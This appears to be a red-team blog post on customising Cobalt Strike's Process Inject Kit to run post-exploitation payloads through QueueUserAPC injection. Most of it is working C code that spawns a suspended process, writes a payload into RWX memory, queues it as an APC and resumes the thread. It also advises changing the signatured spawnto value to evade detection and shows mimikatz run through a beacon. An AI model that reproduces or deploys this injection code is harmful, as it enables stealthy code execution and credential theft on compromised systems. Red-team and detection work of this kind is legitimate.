Customizing Process Injection in Cobalt Strike

Open Table of Contents

Introduction
Cobalt Strike Post-Exploitation in a Nutshell
Goals
Customizing Process Spawning
Getting the spawnto Value
Allocating and Copying Memory
QueueUserAPC
Examining Process Memory
Code Snippets
References

Introduction

In this blog post I discuss about a simple example of modifying Cobalt Strike’s default process injection behavior to use QueueUserAPC through the Process Inject Kit.

Cobalt Strike Post-Exploitation in a Nutshell

When you load BOFs or run tools like Mimikatz through a beacon, Cobalt Strike will either perform inline execution or a fork and run of the capability.

Inline execution: Usually for BOFs, pushed to the beacon and executed within the beacon’s process. Local process memory allocation and injection occurs here.
Fork and run: Spawns a temporary process and injects a DLL into that process. The DLL contains the corresponding capability and is reflectively loaded into the temporary process.

Fork and run commands have two variants:

Process injection spawn: spawns a temporary process, defined by the “spawnto” setting (e.g. when using the spawn command)
Process injection explicit: injects into an existing process (e.g. when using shinject and need to specify a remote process ID)

These two variants are controlled by the BeaconInjectProcess and BeaconInjectTemporaryProcess internal beacon APIs, which provies a layer of abstraction to the actual process injection methods being used.

Before Cobalt Strike 4.5, the only way to modify the process injection techniques was through the teamserver’s C2 profile and didn’t provide much customizability. Now, Cobalt Strike comes with a Process Inject kit that allows operators to customize the process injection methods from these fork and run commands.

Goals

My goal was to implement QueueUserAPC into Cobalt Strike beacons using the Process Inject Kit.

QueueUserAPC allows an application to queue an Asynchronous Procedure Call (APC) to a thread. Once the thread is in an alertable state, the APC is executed. QueueUserAPC also works with suspended threads, as long as the thread is resumed later.

In malware, the APC is usually a pointer to some shellcode, meaning that once the thread is alerted, the shellcode executes.

Since QueueUserAPC requires an alertable or suspended thread, one of the main ways to perform QueueUserAPC is to create a suspended process so that all of its threads are suspended. We can then queue an APC to the suspended process’s main thread, then resume that thread to execute the shellcode.

The Process Inject Kit comes with two .c files, process_inject_spawn.c and process_inject_explicit.c, which contain code to perform their associated fork and run technique.

I decided to go with process_inject_spawn.c for this case, which spawns a temporary process to execute our capabilities. We can alter this code to get our process to spawn in a suspended state and perform QueueUserAPC against it.

Customizing Process Spawning

The code currently uses BeaconSpawnTemporaryProcess, which accounts for things like PPIDs, process architecture, and other Beacon-related data, but doesn’t provide options to create the process in a suspended state.

if (!BeaconSpawnTemporaryProcess(x86, ignoreToken, &si, &pi)) {
  BeaconPrintf(CALLBACK_ERROR, "Unable to spawn %s temporary process.", x86 ? "x86" : "x64");
  return;
}

We would need to use WinAPIs like CreateProcessA for our case.

For all WinAPIs like CreateProcessA, we need to import them into our program by adding something like this to the top of the file:

DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$CreateProcessA (
  LPCSTR lpApplicationName,
  LPSTR lpCommandLine,
  LPSECURITY_ATTRIBUTES lpProcessAttributes,
  LPSECURITY_ATTRIBUTES lpThreadAttributes,
  BOOL bInheritHandles,
  DWORD dwCreationFlags,
  LPVOID lpEnvironment,
  LPCSTR lpCurrentDirectory,
  LPSTARTUPINFOA lpStartupInfo,
  LPPROCESS_INFORMATION lpProcessInformation);

And then in our code, we can call CreateProcessA by using the following:

// CreateProcess in suspended state
char cmd[] = "notepad.exe"
BOOL success = KERNEL32$CreateProcessA(
  NULL,
  cmd,
  NULL,
  NULL,
  FALSE,
  CREATE_NO_WINDOW | CREATE_SUSPENDED,
  NULL,
  NULL,
  &si,
  &pi);
if (!success) {
  BeaconPrintf(CALLBACK_ERROR, "CreateProcessA failed.");
  return;
}

Getting the `spawnto` Value

By default, when running fork and run command using the “spawn” method, Cobalt Strike will spawn rundll32.dll and go on from there. This is the spawnto value of the Cobalt Strike teamserver.

However, this is heavily signatured so it’s common to see operators change this value to something else. We can do this within the beacon by running the command:

spawnto x64 %windir%\sysnative\notepad.exe

Or for the entire teamserver in the C2 profile:

post-ex {
  set spawnto_x86 "%windir%\\syswow64\\notepad.exe";
  set spawnto_x64 "%windir%\\sysnative\\notepad.exe";
}

We want to make sure that our custom process injection method is consistent with this setting, so we use the BeaconGetSpawnTo function which is defined in beacon.h.

void BeaconGetSpawnTo(
  BOOL x86,
  char * buffer,
  int length
)

BeaconGetSpawnTo has three parameters:

x86 determines whether the spawnto value is associated with the x64 or x86 setting
buffer is the char buffer that will store the spawnto value
length is probably the size of the char buffer? I had no idea.

I looked at some GitHub repos of this implementation and found one that defines a constant MAX_PATH_LENGTH as 1000 and just uses it for BeaconGetSpawnTo. So I included that into my code.

// define MAX_PATH_LENGTH at top of file
#define MAX_PATH_LENGTH 1000

// obtain SpawnTo value
char spawnTo[MAX_PATH_LENGTH];
BeaconGetSpawnTo(x86, spawnTo, MAX_PATH_LENGTH);

We can now use this spawnto value in our CreateProcessA function:

// obtain SpawnTo value
char spawnTo[MAX_PATH_LENGTH];
BeaconGetSpawnTo(x86, spawnTo, MAX_PATH_LENGTH);

// CreateProcess in suspended state
BOOL success = KERNEL32$CreateProcessA(
  NULL,
  spawnTo,
  NULL,
  NULL,
  FALSE,
  CREATE_NO_WINDOW | CREATE_SUSPENDED,
  NULL,
  NULL,
  &si,
  &pi);
if (!success) {
  BeaconPrintf(CALLBACK_ERROR, "CreateProcessA failed.");
  return;
}

Allocating and Copying Memory

Before we call QueueUserAPC, we need to allocate memory into the remote process and copy our shellcode into that allocation. For this I decided to go with the good ol’ VirtualAllocEx and WriteProcessMemory.

// allocate memory
LPVOID remoteBuffer = KERNEL32$VirtualAllocEx(
  pi.hProcess,
  NULL,
  dllLen,
  MEM_COMMIT,
  PAGE_EXECUTE_READWRITE);

if (remoteBuffer == NULL) {
  BeaconPrintf(CALLBACK_ERROR, "VirtualAllocEx failed.");
  return;
}

BeaconPrintf(CALLBACK_OUTPUT, "[+] Remote buffer at 0x%p", remoteBuffer);

// write memory
SIZE_T bytesWritten;
success = KERNEL32$WriteProcessMemory(
  pi.hProcess,
  remoteBuffer,
  dllPtr,
  dllLen,
  &bytesWritten);

if (!success) {
  BeaconPrintf(CALLBACK_ERROR, "WriteProcessMemory failed.");
  return;
}

QueueUserAPC

After creating a suspended process, allocating and copying memory into that process, we can finally perform QueueUserAPC against the suspended main thread of the process.

It’s actually pretty easy to do. We just need to call QueueUserAPC against the pointer to the remote shellcode and a handle to the remote, suspended thread. We then call ResumeThread to allow the thread to execute our shellcode.

// QueueUserAPC
DWORD queueUserApcResult = KERNEL32$QueueUserAPC(
  (PAPCFUNC)remoteBuffer,
  pi.hThread,
  0);

if (queueUserApcResult == 0) {
  BeaconPrintf(CALLBACK_ERROR, "QueueUserAPC failed.");
  return;
}

KERNEL32$ResumeThread(pi.hThread);

Examining Process Memory

We can build the kit with build.sh, which produces a .cna file that we can load into our teamserver.

$ ./build.sh /opt/cobaltstrike/custom-inject-output
[Process Inject kit] [+] You have a x86_64 mingw--I will recompile the process inject beacon object files
[Process Inject kit] [*] Compile process_inject_spawn.x64.o
[Process Inject kit] [*] Compile process_inject_spawn.x86.o
[Process Inject kit] [*] Compile process_inject_explicit.x64.o
[Process Inject kit] [*] Compile process_inject_explicit.x86.o
[Process Inject kit] [+] The Process inject object files are saved in '/opt/cobaltstrike/custom-inject-output'

Since I was calling VirtualAllocEx with RWX memory permissions, I wanted to see what it would look like in Process Hacker to confirm that the WinAPIs were being used properly.

I ran mimikatz standard::sleep 80000 on the beacon, since running mimikatz is one of the commands that uses the fork and run method.

Examining the memory contents it seemed that the region had been freed.

This was because I had the setting cleanup set to true in my malleable C2 profile, so I switched that to false and ran the mimikatz command again.

And there it is! The RWX has confirmed that my VirtualAllocEx is being used and my code isn’t broken.

Code Snippets

Imports and constants:

#define MAX_PATH_LENGTH 1000

DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$CreateProcessA (
  LPCSTR lpApplicationName,
  LPSTR lpCommandLine,
  LPSECURITY_ATTRIBUTESlpProcessAttributes,
  LPSECURITY_ATTRIBUTES lpThreadAttributes,
  BOOL bInheritHandles,
  DWORD dwCreationFlags,
  LPVOID lpEnvironment,
  LPCSTR lpCurrentDirectory,
  LPSTARTUPINFOA lpStartupInfo,
  LPPROCESS_INFORMATION lpProcessInformation);

DECLSPEC_IMPORT WINBASEAPI DWORD WINAPI KERNEL32$QueueUserAPC (
  PAPCFUNC pfnAPC,
  HANDLE hThread,
  ULONG_PTR dwData);

DECLSPEC_IMPORT WINBASEAPI DWORD WINAPI KERNEL32$ResumeThread (
  HANDLE hThread);

DECLSPEC_IMPORT WINBASEAPI LPVOID WINAPI KERNEL32$VirtualAllocEx (
  HANDLE hProcess,
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD flALlocationType,
  DWORD flProtect);

DECLSPEC_IMPORT WINBASEAPI WINBOOL WINAPI KERNEL32$WriteProcessMemory (
  HANDLE hProcess,
  LPVOID lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T nSize,
  SIZE_T *lpNumberOfBytesWritten);

QueueUserAPC implementation:

/* begin QueueUserAPC implementation */

// obtain SpawnTo value
char spawnTo[MAX_PATH_LENGTH];
BeaconGetSpawnTo(x86, spawnTo, MAX_PATH_LENGTH);

// CreateProcess in suspended state
BOOL success = KERNEL32$CreateProcessA(
  NULL,
  spawnTo,
  NULL,
  NULL,
  FALSE,
  CREATE_NO_WINDOW | CREATE_SUSPENDED,
  NULL,
  NULL,
  &si,
  &pi);

if (!success) {
  BeaconPrintf(CALLBACK_ERROR, "CreateProcessA failed.");
  return;
}

BeaconPrintf(CALLBACK_OUTPUT, "[+] Process ID of spawned process: %d", pi.dwProcessId);

// allocate memory
LPVOID remoteBuffer = KERNEL32$VirtualAllocEx(
  pi.hProcess,
  NULL,
  dllLen,
  MEM_COMMIT,
  PAGE_EXECUTE_READWRITE);

if (remoteBuffer == NULL) {
  BeaconPrintf(CALLBACK_ERROR, "VirtualAllocEx failed.");
  return;
}

BeaconPrintf(CALLBACK_OUTPUT, "[+] Remote buffer at 0x%p", remoteBuffer);

// write memory
SIZE_T bytesWritten;
success = KERNEL32$WriteProcessMemory(
  pi.hProcess,
  remoteBuffer,
  dllPtr,
  dllLen,
  &bytesWritten);

if (!success) {
  BeaconPrintf(CALLBACK_ERROR, "WriteProcessMemory failed.");
  return;
}

// QueueUserAPC
DWORD queueUserApcResult = KERNEL32$QueueUserAPC(
  (PAPCFUNC)remoteBuffer,
  pi.hThread,
  0);

if (queueUserApcResult == 0) {
  BeaconPrintf(CALLBACK_ERROR, "QueueUserAPC failed.");
  return;
}

KERNEL32$ResumeThread(pi.hThread);